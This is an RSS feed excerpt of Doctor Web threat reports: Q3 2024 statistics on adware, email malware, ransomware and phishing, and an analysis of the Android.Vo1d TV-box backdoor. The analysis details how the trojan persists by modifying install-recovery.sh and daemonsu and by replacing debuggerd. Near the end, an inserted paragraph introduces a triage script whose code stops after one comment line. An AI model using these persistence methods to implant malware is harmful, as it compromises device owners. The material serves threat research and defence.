        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Doctor Web’s virus analysts also discovered more &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans on Google Play. These trojans conceal their icons from the home screen menu and start displaying intrusive ads. The detected malware was camouflaged as various apps, including image collections, photo-editing software, and barcode scanners.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;

  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14915&amp;lng=en</guid><title>Doctor Web’s Q3 2024 virus activity review</title><link>https://news.drweb.com/show/?i=14915&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Oct 2024 01:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;October 1, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to the detection statistics collected by the Dr.Web antivirus, the total number of threats detected in the third quarter of 2024 was up 10.81% over the previous quarter. The number of unique threats decreased by 4.73%. The majority of detections were due to adware programs. Also widespread were malicious scripts, ad-displaying trojans, and trojans distributed within other malware to make the latter more difficult to detect. In email traffic, malicious scripts and programs that exploit vulnerabilities in Microsoft Office documents were most commonly detected.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;On Android devices, the most commonly detected threats were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family, which are used for fraudulent purposes; &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans; and &lt;b&gt;Android.Siggen&lt;/b&gt; malicious apps possessing different functionality. At the same time, in August, our experts discovered &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, a new trojan that had infected nearly 1.3 million TV box sets running Android. In addition, several banking trojans targeting Indonesian users were found.&lt;/p&gt;
  &lt;p&gt;Doctor Web’s virus laboratory also uncovered many new threats on Google Play throughout the third quarter.&lt;/p&gt;
  
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q3 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Adware programs remained the most commonly detected threats.&lt;/li&gt;
      &lt;li&gt;Malicious scripts were again predominant in malicious email traffic.&lt;/li&gt;
      &lt;li&gt;Over 1 million Android-based TV box sets were found to be infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor.&lt;/li&gt;
      &lt;li&gt;New threats were discovered on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.1.png" alt="According to Doctor Web’s statistics service"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common threats in Q3 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20477&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious program that can modify the home page in the browser settings.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A torrent client designed to install unwanted programs on a user’s device.&lt;/dd&gt; 
  &lt;/dl&gt;


  &lt;h2 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.1.png" alt="Statistics for malware discovered in email traffic"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a shortcut that is crafted in a specific way. This shortcut is distributed through removable media, like USB flash drives. To mislead users and conceal its activities, it uses the default icon of a disk drive. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.6154&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1410&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for packed versions of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that are written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;  
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;In Q3 2024, the number of requests made to decrypt files affected by encoder trojans decreased by 15.73%, compared to Q2 2024.&lt;/p&gt;
  &lt;p&gt;The dynamics of the requests Doctor Web’s technical service received to decrypt files affected by encoder trojans:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.1.png" alt="Encryption ransomware"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common encoders of Q3 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 19.38%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.3953&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; — 9.42%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.99%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.89%&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.72%&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;During Q3 2024, Internet scammers continued distributing spam emails containing links leading to various fraudulent sites. Russian-speaking users, for example, again dealt with messages that were supposedly sent on behalf of well-known online stores. Some of these mails offered users the ability to participate in prize draws or get a gift. After clicking on the links in such emails, potential victims were directed to fraudulent sites where they were asked to pay a commission to “receive” their gift or their winnings.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Scammers, allegedly on behalf of an online store, offer their potential victim the chance to “receive their winnings” of 208,760 rubles&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;In other emails, users were supposedly given a discount that could be used to purchase goods in a large electronics store. The links from such messages led to a fake website designed in the style of the genuine store’s site. When potential victims placed an “order” on this fake Internet resource, they had to provide their personal data and bank card information.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fraudulent email that lets recipients “activate a promo code” for buying electronics&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Finance-themed spam remains popular among fraudsters. For instance, threat actors were sending unsolicited emails asking recipients to “confirm” their receipt of large money transfers. An example of one such mail targeting English-speaking users is shown below. It contained a link that led to a phishing login form for an online bank which outwardly resembled the form on the real bank’s website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The user supposedly needs to confirm receipt of US $1,218.16&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A phishing site that fraudsters pass off as a genuine bank website&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Among the unwanted emails targeting Japanese users, our experts detected yet more fake bank notifications—for example, ones that supposedly contained the previous month’s bank card statement. In one of these messages, the scammers disguised the phishing link: the visible link text showed the bank’s genuine web addresses, but the underlying URLs pointed to a fraudulent site, so anyone who clicked was taken there instead.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;All the links in this email actually lead to a phishing website&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;French-speaking users (from Belgium, in particular) encountered phishing emails informing them that their bank accounts were “blocked”. To get them “unblocked”, they were asked to follow a link that actually led to the fraudsters’ website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Scammers scare potential victims with a “blocked” bank account message&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Among Russian users, spam sent supposedly on behalf of well-known banks and offering investment opportunities was once again actively distributed. The links in these emails led to fraudulent sites where visitors were asked to provide personal data, ostensibly to gain access to investment services.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The user, allegedly on behalf of the bank, is being offered the chance to complete a test and become an investor&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, Doctor Web’s Internet analysts detected new phishing websites targeting cryptocurrency owners. On one of them, for example, visitors were informed, supposedly on behalf of a large cryptocurrency exchange, about an undelivered Bitcoin transfer. To “complete” the transaction, potential victims were asked to pay a “commission”. Naturally, no cryptocurrency was ever received by the users—all they did was give their own assets to the scammers.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This fraudulent site informs users about a supposedly unreceived Bitcoin transfer&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;In addition, websites were detected that imitated the look of the VKontakte Russian social network. Visitors to these fake sites were offered the chance to participate in some prize drawing, for which they needed to open several virtual gift boxes. After the potential victims opened the “correct” boxes and allegedly won a large amount of money, the site proposed that they pay a “fee” to receive their “winnings”.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fraudulent site offering visitors the opportunity to “try their luck”&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This user has supposedly won a prize of 194,562 rubles&lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb.com/dangerous_urls/?lng=en" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;  
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
  &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q3 2024, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which threat actors use in various fraudulent schemes, were most often detected on protected devices. The second most common were adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. These were followed by &lt;b&gt;Android.Siggen&lt;/b&gt; trojans.&lt;/p&gt;
  &lt;p&gt;Over the past observation period, our specialists discovered many new threats on Google Play. Among them were different trojan variants from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; families. Moreover, an attack on Android TV boxes was detected, with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor infecting about 1.3 million devices belonging to users in 197 countries. It placed its components in the system storage area and, when commanded by threat actors, could covertly download and install third-party software. Additionally, the banking trojans &lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt; and &lt;b&gt;Android.SmsSpy.11629&lt;/b&gt;, which targeted Indonesian users, were found.&lt;/p&gt;
  &lt;p&gt;The following Q3 2024 events involving mobile malware are the most noteworthy:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;The discovery of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor, which infected over a million TV boxes,&lt;/li&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps,&lt;/li&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans,&lt;/li&gt;
    &lt;li&gt;The emergence of new threats on Google Play.&lt;/li&gt;
  &lt;/ul&gt;

  &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q3 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14912&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14900&amp;lng=en</guid><title>Void captures over a million Android TV boxes</title><link>https://news.drweb.com/show/?i=14900&amp;lng=en&amp;c=9</link><pubDate>Thu, 12 Sep 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;September 12, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web experts have uncovered yet another case of an Android-based TV box infection. The malware, dubbed &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, has infected nearly 1.3 million devices belonging to users in 197 countries. It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In August 2024, Doctor Web was contacted by several users whose Dr.Web antivirus had detected changes in their device’s system file area. The problem occurred with these models:&lt;/p&gt;

&lt;table class="Table"&gt;
    &lt;thead&gt;
      &lt;tr&gt;
        &lt;th&gt;TV box model&lt;/th&gt;
        &lt;th&gt;Declared firmware version&lt;/th&gt;
      &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td&gt;R4&lt;/td&gt;
        &lt;td&gt;Android 7.1.2; R4 Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;TV BOX&lt;/td&gt;
        &lt;td&gt;Android 12.1; TV BOX Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;KJ-SMART4KVIP&lt;/td&gt;
        &lt;td&gt;Android 10.1; KJ-SMART4KVIP Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;All these cases involved similar signs of infection, so we will describe them using one of the first requests we received as an example. The following objects were changed on the affected TV box:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In addition, 4 new files emerged in its file system:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/vo1d&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/wd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd_real&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;vo1d&lt;/span&gt; and &lt;span class="string"&gt;wd&lt;/span&gt; files are the components of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan that we discovered.&lt;/p&gt;

&lt;blockquote&gt;
  The trojan’s authors probably tried to disguise one of its components as the system program /system/bin/vold by giving it the similar-looking name “vo1d” (substituting the lowercase letter “l” with the digit “1”). The malicious program’s name comes from the name of this file. The spelling also echoes the English word “void”.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; file is a shell script that is present on most Android devices. It is executed by init when the operating system boots, so any commands added to it run automatically on every start. Malware that has root access and can write to the &lt;span class="string"&gt;/system&lt;/span&gt; partition can therefore persist on the infected device by appending itself to this script (or by creating the script from scratch if it is not present). &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; registered the autostart of its &lt;span class="string"&gt;wd&lt;/span&gt; component in this file.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" alt="The modified install-recovery.sh file"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The modified install-recovery.sh file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;daemonsu&lt;/span&gt; file is present on many rooted Android devices: it is the su daemon of the SuperSU rooting package, started by the system at boot, which serves root-privilege requests. &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; registered itself in this file as well, again setting up autostart for the &lt;span class="string"&gt;wd&lt;/span&gt; module.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;debuggerd&lt;/span&gt; file is the Android daemon that handles crashes of native processes and writes crash reports (tombstones). On the infected TV box, this binary had been replaced by a script that launches the &lt;span class="string"&gt;wd&lt;/span&gt; component.&lt;/p&gt;

&lt;p&gt;In the case under review, the &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; file is a second copy of the script that replaced the genuine &lt;span class="string"&gt;debuggerd&lt;/span&gt;. Doctor Web experts believe that the trojan’s authors intended the original &lt;span class="string"&gt;debuggerd&lt;/span&gt; to be moved to &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; so that crash reporting would keep working. However, because the infection was probably carried out twice, the trojan moved the already substituted file (i.e., its own script). As a result, the device held two copies of the trojan’s script and no genuine &lt;span class="string"&gt;debuggerd&lt;/span&gt; binary at all.&lt;/p&gt;

&lt;p&gt;At the same time, other users who contacted us had a slightly different list of files on their infected devices:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt; (the &lt;span class="string"&gt;vo1d&lt;/span&gt; file analogue — &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd&lt;/span&gt; (the same script as described above);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd_real&lt;/span&gt; (the original file of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; tool);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; (a script that loads objects specified in it).  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;An analysis of all the aforementioned files showed that, to persist &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; in the system, its authors used at least three different methods: modification of the &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; and &lt;span class="string"&gt;daemonsu&lt;/span&gt; files and substitution of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; program. They probably expected at least one of the target files to be present on a given device, since manipulating even one of them is enough to ensure the trojan’s launch on subsequent reboots.&lt;/p&gt;
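&lt;p&gt;The three persistence methods above translate directly into a triage check. The script below is an added example, not Doctor Web’s tooling and not taken from the report: it scans an Android &lt;span class="string"&gt;/system&lt;/span&gt; tree for the artifacts listed above (the dropped &lt;span class="string"&gt;vo1d&lt;/span&gt; and &lt;span class="string"&gt;wd&lt;/span&gt; files, a &lt;span class="string"&gt;debuggerd&lt;/span&gt; that is a shell script rather than an ELF binary, and a &lt;span class="string"&gt;wd&lt;/span&gt; autostart entry in &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; or &lt;span class="string"&gt;daemonsu&lt;/span&gt;). The function names, the script name &lt;span class="string"&gt;vo1d_check.sh&lt;/span&gt; and the candidate paths for &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; and &lt;span class="string"&gt;daemonsu&lt;/span&gt; are assumptions; the report does not state where those two files lived on the affected boxes, so adjust them to your firmware. Run it as root on the box (&lt;span class="string"&gt;adb shell su -c 'sh vo1d_check.sh /'&lt;/span&gt;) or point it at a mounted or pulled system image.&lt;/p&gt;

```shell
# Added triage script (not Doctor Web's tooling): looks for the Android.Vo1d
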